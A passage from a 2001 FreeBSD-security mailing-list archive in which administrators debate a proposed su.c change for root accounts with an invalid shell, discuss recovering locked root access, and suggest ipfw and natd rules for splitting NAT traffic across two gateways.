f33IMfIr069444; Tue, 3 Apr 2001 13:22:48 -0500 (CDT) Message-Id: <5.0.2.1.0.20010403131900.00af5eb0@pop.schulte.org> X-Sender: schulte@pop.schulte.org X-Mailer: QUALCOMM Windows Eudora Version 5.0.2 Date: Tue, 03 Apr 2001 13:22:18 -0500 To: Craig Cowen , freebsd-security@FreeBSD.ORG From: Christopher Schulte Subject: Re: su change? Cc: freebsd-stable@FreeBSD.ORG In-Reply-To: <3ACA12BD.A8706D97@allmaui.com> References: <005401c0bc63$7cb36650$0202a8c0@majorzoot> <001f01c0bc68$681a2b20$1200a8c0@gsicomp.on.ca> <20010403140935.F9618@pir.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 11:13 AM 4/3/2001 -0700, Craig Cowen wrote: >I worked at an isp and the office staff was responsible for terminating >accounts. Well, one particular staff member kept screwing up in vi and wiping >out the root user's entry. >That's when I made them use chsh > >I believe that it will give error messages like visudo to common mistakes. Good grief. One should always use utilities like vipw or chsh when editing the password databases. They do sanity checking, locking, and other magically important tasks which a simple `vi` won't. Not to mention that on FreeBSD, vipw and chsh will also run pwd_mkdb automatically. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 11:29:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from moek.pir.net (moek.pir.net [130.64.1.215]) by hub.freebsd.org (Postfix) with ESMTP id 1B4C137B71F; Tue, 3 Apr 2001 11:29:43 -0700 (PDT) (envelope-from pir@pir.net) Received: from pir by moek.pir.net with local (Exim) id 14kVYi-00030d-00 ; Tue, 03 Apr 2001 14:29:40 -0400 Date: Tue, 3 Apr 2001 14:29:39 -0400 From: Peter Radcliffe To: freebsd-security@FreeBSD.ORG, freebsd-stable@FreeBSD.ORG Subject: Re: su change? Message-ID: <20010403142939.G9618@pir.net> Reply-To: freebsd-security@freebsd.org Mail-Followup-To: freebsd-security@FreeBSD.ORG, freebsd-stable@FreeBSD.ORG References: <005401c0bc63$7cb36650$0202a8c0@majorzoot> <001f01c0bc68$681a2b20$1200a8c0@gsicomp.on.ca> <20010403140935.F9618@pir.net> <3ACA12FF.F4000B95@allmaui.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3ACA12FF.F4000B95@allmaui.com>; from craig@allmaui.com on Tue, Apr 03, 2001 at 11:14:23AM -0700 X-fish: < X-Copy-On-Listmail: Please do NOT Cc: me on list mail. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Craig Cowen probably said: > FALSE! If you have the boot prom set not to allow booting from > cdrom, you're bummin' Then you change the prom settings. Hardly rocket science and doesn't make it untrue. If you're going to "reinstall" because of one little mistake like that you'd have to boot from different media anyway. Next you're going to say "But, but, what if you didn't have a cdrom drive ? ... or someone forgot the prom password !" ? All these things are different issues and can be fixed. Yeesh. P. -- pir pir@pir.net pir@net.tufts.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 11:32:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id EC12A37B719; Tue, 3 Apr 2001 11:32:53 -0700 (PDT) (envelope-from cjclark@alum.mit.edu) Received: from alum.mit.edu ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GB8BIA00.LZF; Tue, 3 Apr 2001 11:32:34 -0700 Message-ID: <3ACA1755.7C98C5@alum.mit.edu> Date: Tue, 03 Apr 2001 11:32:53 -0700 From: Crist Clark X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Craig Cowen Cc: freebsd-security@FreeBSD.ORG, freebsd-stable@FreeBSD.ORG Subject: Re: su change? References: <005401c0bc63$7cb36650$0202a8c0@majorzoot> <001f01c0bc68$681a2b20$1200a8c0@gsicomp.on.ca> <20010403140935.F9618@pir.net> <3ACA12FF.F4000B95@allmaui.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [-stable cut from CC-list. -security almost cut.] Craig Cowen wrote: > > FALSE! If you have the boot prom set not to allow booting from cdrom, you're > bummin' Then just enable it again. Jeesh. It's more fun if the system has no CDROM, tho' (or floppy to boot up OpenBSD). Ever tried to setup a netboot into single-user just to access a messed up Sun box? If you've put a password in the boot PROM and forgotten that however, you are fscked. Time to buy a new chip! > > Matthew Emmerton probably said: > > > Just consider your friend lucky - doing similar things to the root account > > > on any enterprise UNIX (UnixWare, Solaris, AIX) could require a complete > > > reinstall - especially if it's running C2-level security. If you're running a trusted system, is root even that special anymore? Messing up root should be just like messing up any other account. > > False. > > > > Solaris, certainly, would just require booting from cdrom, mounting / > > and editing the password file. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 11:37:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from sherline.com (sherline.net [216.120.87.2]) by hub.freebsd.org (Postfix) with SMTP id 36C8E37B725 for ; Tue, 3 Apr 2001 11:37:53 -0700 (PDT) (envelope-from data@irev.net) Received: (qmail 24476 invoked from network); 3 Apr 2001 18:37:50 -0000 Received: from unknown (HELO server2) (216.120.87.3) by 216.120.87.2 with SMTP; 3 Apr 2001 18:37:50 -0000 Message-ID: <002d01c0bc6d$2d558390$035778d8@sherline.net> From: "Jeremiah Gowdy" To: "Matthew Emmerton" , "Kherry Zamore" , Cc: References: <005401c0bc63$7cb36650$0202a8c0@majorzoot> <001f01c0bc68$681a2b20$1200a8c0@gsicomp.on.ca> Subject: Re: su change? Date: Tue, 3 Apr 2001 11:37:46 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > if (!chshell(pwd->pw_shell) && ruid) > > errx(1, "permission denied (shell)."); > > > > The only thing we need to prepend to this is a check to see if we are > trying > > to su to root, which we should allow regardless of the shell specified: > > I disagree. The root account is an account that needs to have the highest > number of security checks present. Then make a point as to why root, when not having a valid shell, not being able to log in is a useful security check in any way shape or form. So people can change root's shell to something invalid when they want to lock the root account ? That's nonsensical. If root doesn't have a valid shell, something is broken. If someone gets to that stage in the code for su, they already have an account in wheel, and the root password. You're saying that in the situation in which someone has an account in wheel and the root password, but root's shell is invalid, access should be denied ? I fail to see the security value in this. I support the code patch, while it's value is minimal, the behavior is not unreasonable or insecure. > Just consider your friend lucky - doing similar things to the root account > on any enterprise UNIX (UnixWare, Solaris, AIX) could require a complete > reinstall - especially if it's running C2-level security. Sigh. I won't bother arguing this. I think some else has. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 11:40:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from allmaui.com (server25.aitcom.net [208.234.0.10]) by hub.freebsd.org (Postfix) with ESMTP id 7FDC537B71C for ; Tue, 3 Apr 2001 11:40:36 -0700 (PDT) (envelope-from craig@allmaui.com) Received: from allmaui.com (pwnat-2-o.placeware.com [209.1.15.34]) by allmaui.com (8.8.8/8.8.5) with ESMTP id OAA29663 for ; Tue, 3 Apr 2001 14:40:32 -0400 Message-ID: <3ACA18AE.1DA31CBC@allmaui.com> Date: Tue, 03 Apr 2001 11:38:38 -0700 From: Craig Cowen X-Mailer: Mozilla 4.76 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: Re: su change? References: <005401c0bc63$7cb36650$0202a8c0@majorzoot> <001f01c0bc68$681a2b20$1200a8c0@gsicomp.on.ca> <20010403140935.F9618@pir.net> <3ACA12FF.F4000B95@allmaui.com> <20010403142939.G9618@pir.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org No actually I am going to point back at the moron that fried root's access. HaHa Peter Radcliffe wrote: > Craig Cowen probably said: > > FALSE! If you have the boot prom set not to allow booting from > > cdrom, you're bummin' > > Then you change the prom settings. Hardly rocket science and doesn't > make it untrue. > > If you're going to "reinstall" because of one little mistake like that > you'd have to boot from different media anyway. > > Next you're going to say "But, but, what if you didn't have a cdrom > drive ? ... or someone forgot the prom password !" ? All these things > are different issues and can be fixed. > > Yeesh. > > P. > > -- > pir pir@pir.net pir@net.tufts.edu > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 11:42:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from moek.pir.net (moek.pir.net [130.64.1.215]) by hub.freebsd.org (Postfix) with ESMTP id 6660B37B71D for ; Tue, 3 Apr 2001 11:42:43 -0700 (PDT) (envelope-from pir@pir.net) Received: from pir by moek.pir.net with local (Exim) id 14kVlI-00038Y-00 for freebsd-security@FreeBSD.ORG; Tue, 03 Apr 2001 14:42:40 -0400 Date: Tue, 3 Apr 2001 14:42:40 -0400 From: Peter Radcliffe To: freebsd-security@FreeBSD.ORG Subject: Re: su change? Message-ID: <20010403144240.H9618@pir.net> Reply-To: freebsd-security@freebsd.org Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <005401c0bc63$7cb36650$0202a8c0@majorzoot> <001f01c0bc68$681a2b20$1200a8c0@gsicomp.on.ca> <20010403140935.F9618@pir.net> <3ACA12FF.F4000B95@allmaui.com> <3ACA1755.7C98C5@alum.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3ACA1755.7C98C5@alum.mit.edu>; from cjclark@alum.mit.edu on Tue, Apr 03, 2001 at 11:32:53AM -0700 X-fish: < X-Copy-On-Listmail: Please do NOT Cc: me on list mail. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Crist Clark probably said: [misquoted text cut. please learn to quote correctly] > If you've put a password in the boot PROM and forgotten that however, you > are fscked. Time to buy a new chip! *sigh* You don't know when to give up, do you ? What does forgetting the prom password on a sparc have to do with your incorrect comment on screwing up root's password entry on a Solaris box ? Oh, and you're incorrect again. You can remove a lost PROM password without replacing the PROM, assuming you have physical access which you'd have to have to replace it. Some are easier than others and the easier ones depend on other settings in the prom, but it can be done in several ways. The NVRAM FAQ lists some of them; http://www.squirrel.com/squirrel/sun-nvram-hostid.faq.html Quit wasting time and bandwidth arguing about things you don't know enough about on inappropriate lists ? P. -- pir pir@pir.net pir@net.tufts.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 11:44:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from moek.pir.net (moek.pir.net [130.64.1.215]) by hub.freebsd.org (Postfix) with ESMTP id 3EBA537B71C for ; Tue, 3 Apr 2001 11:44:22 -0700 (PDT) (envelope-from pir@pir.net) Received: from pir by moek.pir.net with local (Exim) id 14kVmt-00038y-00 for freebsd-security@FreeBSD.ORG; Tue, 03 Apr 2001 14:44:19 -0400 Date: Tue, 3 Apr 2001 14:44:19 -0400 From: Peter Radcliffe To: freebsd-security@FreeBSD.ORG Subject: Re: su change? Message-ID: <20010403144419.I9618@pir.net> Reply-To: freebsd-security@freebsd.org Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <005401c0bc63$7cb36650$0202a8c0@majorzoot> <001f01c0bc68$681a2b20$1200a8c0@gsicomp.on.ca> <20010403140935.F9618@pir.net> <3ACA12FF.F4000B95@allmaui.com> <3ACA1755.7C98C5@alum.mit.edu> <20010403144240.H9618@pir.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010403144240.H9618@pir.net>; from pir@pir.net on Tue, Apr 03, 2001 at 02:42:40PM -0400 X-fish: < X-Copy-On-Listmail: Please do NOT Cc: me on list mail. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Peter Radcliffe probably said: > You don't know when to give up, do you ? My mistake - a different person taking up the fold. > Quit wasting time and bandwidth arguing about things you don't know > enough about on inappropriate lists ? This comment still stands, however. P. -- pir pir@pir.net pir@net.tufts.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 11:51:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from guru.mired.org (okc-65-26-235-186.mmcable.com [65.26.235.186]) by hub.freebsd.org (Postfix) with SMTP id AFA4137B724 for ; Tue, 3 Apr 2001 11:51:22 -0700 (PDT) (envelope-from mwm@mired.org) Received: (qmail 85540 invoked by uid 100); 3 Apr 2001 18:51:21 -0000 From: Mike Meyer MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15050.7081.662834.357741@guru.mired.org> Date: Tue, 3 Apr 2001 13:51:21 -0500 To: "Matthew Emmerton" Cc: "Kherry Zamore" , , Subject: Re: su change? In-Reply-To: <001f01c0bc68$681a2b20$1200a8c0@gsicomp.on.ca> References: <005401c0bc63$7cb36650$0202a8c0@majorzoot> <001f01c0bc68$681a2b20$1200a8c0@gsicomp.on.ca> X-Mailer: VM 6.90 under 21.1 (patch 14) "Cuyahoga Valley" XEmacs Lucid X-face: "5Mnwy%?j>IIV\)A=):rjWL~NB2aH[}Yq8Z=u~vJ`"(,&SiLvbbz2W`;h9L,Yg`+vb1>RG% *h+%X^n0EZd>TM8_IB;a8F?(Fb"lw'IgCoyM.[Lg#r\ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matthew Emmerton types: > > According to su.c, if the user you are changing to does not have a valid > > shell, su complains and exits. A valid thing to do in today's security > > conscience society. Now, lets say you want to become root to fix this > > invalid shell problem.. su's nature is to complain and exit. The fix is > > rather simple, somewhere around line 310 in su.c is: > > > > if (!chshell(pwd->pw_shell) && ruid) > > errx(1, "permission denied (shell)."); > > > > The only thing we need to prepend to this is a check to see if we are > trying > > to su to root, which we should allow regardless of the shell specified: > I disagree. The root account is an account that needs to have the highest > number of security checks present. If you're swift enough to change root's > shell to something non-standard and forget to update /etc/shells, then > having to drop to single user mode is suitable punishment. After all, > playing with the root user is like playing with fire -- sooner or later > you're going to get burned. The fix he suggested isn't for the case of root's shell not being in /etc/shells, it's for the case of root's shell not being an executable. If root shell isn't in /etc/shells, then stock su with no arguments will work just fine - you'll just get the non-standard shell. If root's shell isn't executable, then su with no flags fails because the exec of the shell fails. If you try and use the "-m" flag to su and start your shell, the quoted code causes a failure. Only root (the "&& ruid" test) is allowed to su to an account with a non-standard shell without using the non-standard shell. If you hit that case, and don't have a root shell around, you're pretty much hosed. You have to power cycle to get the machine to a state where this can be fixed, whether that means just booting single-user, or booting from an alternate media of some kind, or something really extreme. Sudo can probably be configured to solve the problem as well. This just expands the current policy of "Only root can get a standard shell for an account with a non-standard shell" to include the case where the account is root. I think it would be better if the code showed that, though: if (!chshell(pwd->pwd_shell) && ruid && pwd->pw_uid) errx(1, "permission denied (shell)."); but that's just me. On the other hand, I advise against changing root shell, and this lends weight to that advice. http://www.mired.org/home/mwm/ Independent WWW/Perforce/FreeBSD/Unix consultant, email for more information. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 12:31:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 4EC1737B71E; Tue, 3 Apr 2001 12:31:54 -0700 (PDT) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (1625 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Tue, 3 Apr 2001 14:30:12 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Tue, 3 Apr 2001 14:30:12 -0500 (CDT) From: James Wyatt To: freebsd-security@freebsd.org Cc: freebsd-stable@FreeBSD.ORG Subject: Re: su change? In-Reply-To: <20010403140935.F9618@pir.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 3 Apr 2001, Peter Radcliffe wrote: > Matthew Emmerton probably said: > > Just consider your friend lucky - doing similar things to the root account > > on any enterprise UNIX (UnixWare, Solaris, AIX) could require a complete > > reinstall - especially if it's running C2-level security. > > False. > > Solaris, certainly, would just require booting from cdrom, mounting / > and editing the password file. Why is booting from CDROM a better fix than booting single-user from the hard disk? The original poster wanted to avaoid a reboot *at all*. Solaris, AIX, and even FreeBSD can be booted from a CDROM nowadays, but I've recovered a SCO system that had a security-fault in it's trustware. Reinsall was the advised procedure, but there were enough security-db tools to recover the root account. On the high-security systems I've seen, a skilled tech can usually recover the system to allow operation, but the machine should be considered tainted and reinstalled ASAP if you ever want support from the vendor or peace from your auditors. - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 12:57: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from server.c21bowman.com (ns1.c21mb.com [216.140.51.98]) by hub.freebsd.org (Postfix) with SMTP id D5D1E37B722 for ; Tue, 3 Apr 2001 12:56:56 -0700 (PDT) (envelope-from owensmk@earthlink.net) Received: (qmail 9558 invoked by uid 0); 2 Apr 2001 22:47:43 -0000 Received: from unknown (HELO mike) (10.10.10.200) by server with SMTP; 2 Apr 2001 22:47:43 -0000 From: Michael Owens Reply-To: owensmk@earthlink.net Date: Mon, 2 Apr 2001 16:48:54 -0500 X-Mailer: KMail [version 1.1.99] Content-Type: text/plain; charset="iso-8859-1" To: security@freebsd.org Subject: Multiple Default Gateways using DIVERT MIME-Version: 1.0 Message-Id: <0104021648540A.00570@mike> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org My company has a single DSL line through which I have set up internet access via NAT using IPF. We are getting a second DSL line, and I was wondering what the best way, if any, would be to use NAT and different default gateways so as to divide up the groups by source address across them. I would like 10.10.10.1-128 to go through gateway 1 (say 2.2.2.1) and 10.10.10.129-254 through gateway 2 (say 2.2.2.2). I have searched the mail archives and seen various suggestions, but none seemed to address this specifically. I know this can't be done with IPF, so I am asking if this is something that could be done with IPFW. From what I can tell, it might using divert, but I am not all that clear on divert's use in varying gateways. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 13:20: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from boromir.vpop.net (dns1.vpop.net [206.117.147.2]) by hub.freebsd.org (Postfix) with ESMTP id 6255537B725 for ; Tue, 3 Apr 2001 13:20:02 -0700 (PDT) (envelope-from mreimer@vpop.net) Received: from vpop.net ([209.102.16.48]) by boromir.vpop.net (8.11.2/8.11.2) with ESMTP id f33KJun92940; Tue, 3 Apr 2001 13:19:56 -0700 (PDT) (envelope-from mreimer@vpop.net) Message-ID: <3ACA3077.BA9CFFCE@vpop.net> Date: Tue, 03 Apr 2001 13:20:07 -0700 From: Matthew Reimer Organization: VPOP Technologies, Inc. X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: owensmk@earthlink.net, security@freebsd.org Subject: Re: Multiple Default Gateways using DIVERT References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Michael Owens wrote: > > My company has a single DSL line through which I have set up internet access > via NAT using IPF. > > We are getting a second DSL line, and I was wondering what the best way, if > any, would be to use NAT and different default gateways so as to divide up > the groups by source address across them. I would like 10.10.10.1-128 to go > through gateway 1 (say 2.2.2.1) and 10.10.10.129-254 through gateway 2 (say > 2.2.2.2). I have searched the mail archives and seen various suggestions, but > none seemed to address this specifically. > > I know this can't be done with IPF, so I am asking if this is something that > could be done with IPFW. From what I can tell, it might using divert, but I > am not all that clear on divert's use in varying gateways. This might be a start, though I'm not sure how NAT should fit in. You'll need the IPFIREWALL and IPFIREWALL_FORWARD kernel options. ipfw add 1000 fwd 2.2.2.1 ip from 10.10.10.0/25 to any ipfw add 2000 fwd 2.2.2.2 ip from 10.10.10.128/25 to any Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 13:20:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from moek.pir.net (moek.pir.net [130.64.1.215]) by hub.freebsd.org (Postfix) with ESMTP id E6CB337B71B; Tue, 3 Apr 2001 13:20:50 -0700 (PDT) (envelope-from pir@pir.net) Received: from pir by moek.pir.net with local (Exim) id 14kXIG-0003yA-00 ; Tue, 03 Apr 2001 16:20:48 -0400 Date: Tue, 3 Apr 2001 16:20:47 -0400 From: Peter Radcliffe To: freebsd-security@freebsd.org, freebsd-stable@FreeBSD.ORG Subject: Re: su change? Message-ID: <20010403162047.G13435@pir.net> Reply-To: freebsd-security@freebsd.org Mail-Followup-To: freebsd-security@freebsd.org, freebsd-stable@FreeBSD.ORG References: <20010403140935.F9618@pir.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from jwyatt@rwsystems.net on Tue, Apr 03, 2001 at 02:30:12PM -0500 X-fish: < X-Copy-On-Listmail: Please do NOT Cc: me on list mail. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org James Wyatt probably said: > On Tue, 3 Apr 2001, Peter Radcliffe wrote: > > Matthew Emmerton probably said: > > > Just consider your friend lucky - doing similar things to the > > > root account on any enterprise UNIX (UnixWare, Solaris, AIX) > > > could require a complete reinstall - especially if it's running > > > C2-level security. > > False. > > Solaris, certainly, would just require booting from cdrom, mounting / > > and editing the password file. > Why is booting from CDROM a better fix than booting single-user from the > hard disk? The original poster wanted to avaoid a reboot *at all*. I didn't say it was better, I just corrected the comment that you'd have to reinstall. P. -- pir pir@pir.net pir@net.tufts.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 14: 9:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from netau1.alcanet.com.au (ntp.alcanet.com.au [203.62.196.27]) by hub.freebsd.org (Postfix) with ESMTP id 5D1B337B71B for ; Tue, 3 Apr 2001 14:09:39 -0700 (PDT) (envelope-from jeremyp@gsmx07.alcatel.com.au) Received: from mfg1.cim.alcatel.com.au (mfg1.cim.alcatel.com.au [139.188.23.1]) by netau1.alcanet.com.au (8.9.3 (PHNE_22672)/8.9.3) with ESMTP id HAA06435; Wed, 4 Apr 2001 07:09:29 +1000 (EST) Received: from gsmx07.alcatel.com.au by cim.alcatel.com.au (PMDF V5.2-32 #37645) with ESMTP id <01K1ZRMX400WS4MGOY@cim.alcatel.com.au>; Wed, 4 Apr 2001 07:09:23 +1100 Received: (from jeremyp@localhost) by gsmx07.alcatel.com.au (8.11.1/8.11.1) id f33L9NY54480; Wed, 04 Apr 2001 07:09:23 +1000 (EST envelope-from jeremyp) Content-return: prohibited Date: Wed, 04 Apr 2001 07:09:23 +1000 From: Peter Jeremy Subject: Re: Multiple Default Gateways using DIVERT In-reply-to: <0104021648540A.00570@mike>; from owensmk@earthlink.net on Mon, Apr 02, 2001 at 04:48:54PM -0500 To: Michael Owens Cc: security@FreeBSD.ORG Mail-Followup-To: Michael Owens , security@FreeBSD.ORG Message-id: <20010404070923.O27632@gsmx07.alcatel.com.au> MIME-version: 1.0 Content-type: text/plain; charset=us-ascii Content-disposition: inline User-Agent: Mutt/1.2.5i References: <0104021648540A.00570@mike> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 2001-Apr-02 16:48:54 -0500, Michael Owens wrote: >We are getting a second DSL line, and I was wondering what the best way, if >any, would be to use NAT and different default gateways so as to divide up >the groups by source address across them. I would like 10.10.10.1-128 to go >through gateway 1 (say 2.2.2.1) and 10.10.10.129-254 through gateway 2 (say >2.2.2.2). I have searched the mail archives and seen various suggestions, but >none seemed to address this specifically. I presume you're interested in outgoing, rather than incoming access. I'm (ab)using ipfw/natd to do something fairly similar to this. Basically I have an ipfw divert to natd and then in my natd.cf file I have a list of redirect addresses. In your case, it would look like: redirect_address 10.10.10.1 2.2.2.1 redirect_address 10.10.10.2 2.2.2.1 redirect_address 10.10.10.3 2.2.2.1 ... redirect_address 10.10.10.128 2.2.2.1 redirect_address 10.10.10.129 2.2.2.2 redirect_address 10.10.10.130 2.2.2.2 redirect_address 10.10.10.131 2.2.2.2 ... redirect_address 10.10.10.254 2.2.2.2 The downside is that you need to list each internal address (or at least half of them, with the remainder handled via a target_address directive). If your internal address split can be represented by a mask (ie 10.10.10.0/25 => 2.2.2.1 and 10.10.10.128/25 => 2.2.2.2) then another alternative would be to use two natd's (on different divert ports with different config files) with ipfw rules to split the packets between them. Note that the mask does not need to be a normal subnet mask - it can be an arbitrary bit pattern. As an example 10.10.10.1/255.255.255.1 could be used to split addresses into even and odd. Unfortunately, I don't think there's any simple way to statistically split the traffic between the different gateways. If you're concerned about reliability, you might also consider hacking up some tools to automatically redirect all your internal hosts via one gateway if the other fails. This wouldn't save pre-existing connections, but would at least let you set up new ones. Note that natd is inherently less efficient than ipnat because it is userland. This means that each packet goes kernel->userland->kernel, which is quite expensive. Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 15:37:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from xena.gsicomp.on.ca (cr677933-a.ktchnr1.on.wave.home.com [24.43.230.149]) by hub.freebsd.org (Postfix) with ESMTP id 05B3337B71A; Tue, 3 Apr 2001 15:37:08 -0700 (PDT) (envelope-from matt@gsicomp.on.ca) Received: from hermes (hermes.gsicomp.on.ca [192.168.0.18]) by xena.gsicomp.on.ca (8.11.1/8.11.3) with SMTP id f33MYnR04124; Tue, 3 Apr 2001 18:34:56 -0400 (EDT) (envelope-from matt@gsicomp.on.ca) Message-ID: <009001c0bc8e$a1eb6370$1200a8c0@gsicomp.on.ca> From: "Matthew Emmerton" To: "Jeremiah Gowdy" , "Kherry Zamore" , Cc: References: <005401c0bc63$7cb36650$0202a8c0@majorzoot> <001f01c0bc68$681a2b20$1200a8c0@gsicomp.on.ca> <002d01c0bc6d$2d558390$035778d8@sherline.net> Subject: Re: su change? Date: Tue, 3 Apr 2001 18:37:01 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > if (!chshell(pwd->pw_shell) && ruid) > > > errx(1, "permission denied (shell)."); > > > > > > The only thing we need to prepend to this is a check to see if we are > > trying > > > to su to root, which we should allow regardless of the shell specified: > > > > I disagree. The root account is an account that needs to have the highest > > number of security checks present. > > Then make a point as to why root, when not having a valid shell, not being > able to log in is a useful security check in any way shape or form. So > people can change root's shell to something invalid when they want to lock > the root account ? That's nonsensical. Last time I checked, only root had write access to /etc/master.passwd and /etc/shells, so only someone who hacked root could change root's shell to something invalid. (Note that I'm not handling the case of where an administrator does something stupid.) gabby# ls -al /etc/shells /etc/master.passwd -rw-r--r- 1 root wheel 223 Jul 28 2000 /etc/shells -rw------ 1 root wheel 1423 mar 18 14:10 /etc/master.passwd gabby# If someone happens to change root's shell, then the security of the machine has been breached in some way. The immediate consequence is that root can't log in. If you (the administrator) notices that you can't log in as root anymore, then it's a really big clue that something major is wrong, and would neccessitate taking the machine out of multi-user mode ASAP to perform the investigation and fix things up. Furthermore, if taking the machine down to single-user mode is a real big problem (because it's a production machine or something equally important), then the fact that someone's compromised root makes taking the machine down a very reasonable thing to do. The lesson? Don't screw with production machines unless you know the consequences of your actions, and if you must screw around, make sure you're using the appropriate tools (vipw, chsh, etc) to ensure that your changes are valid. -- Matt Emmerton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 3 15:40:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from sherline.com (sherline.net [216.120.87.2]) by hub.freebsd.org (Postfix) with SMTP id 08EF337B71A for ; Tue, 3 Apr 2001 15:40:18 -0700 (PDT) (envelope-from data@irev.net) Received: (qmail 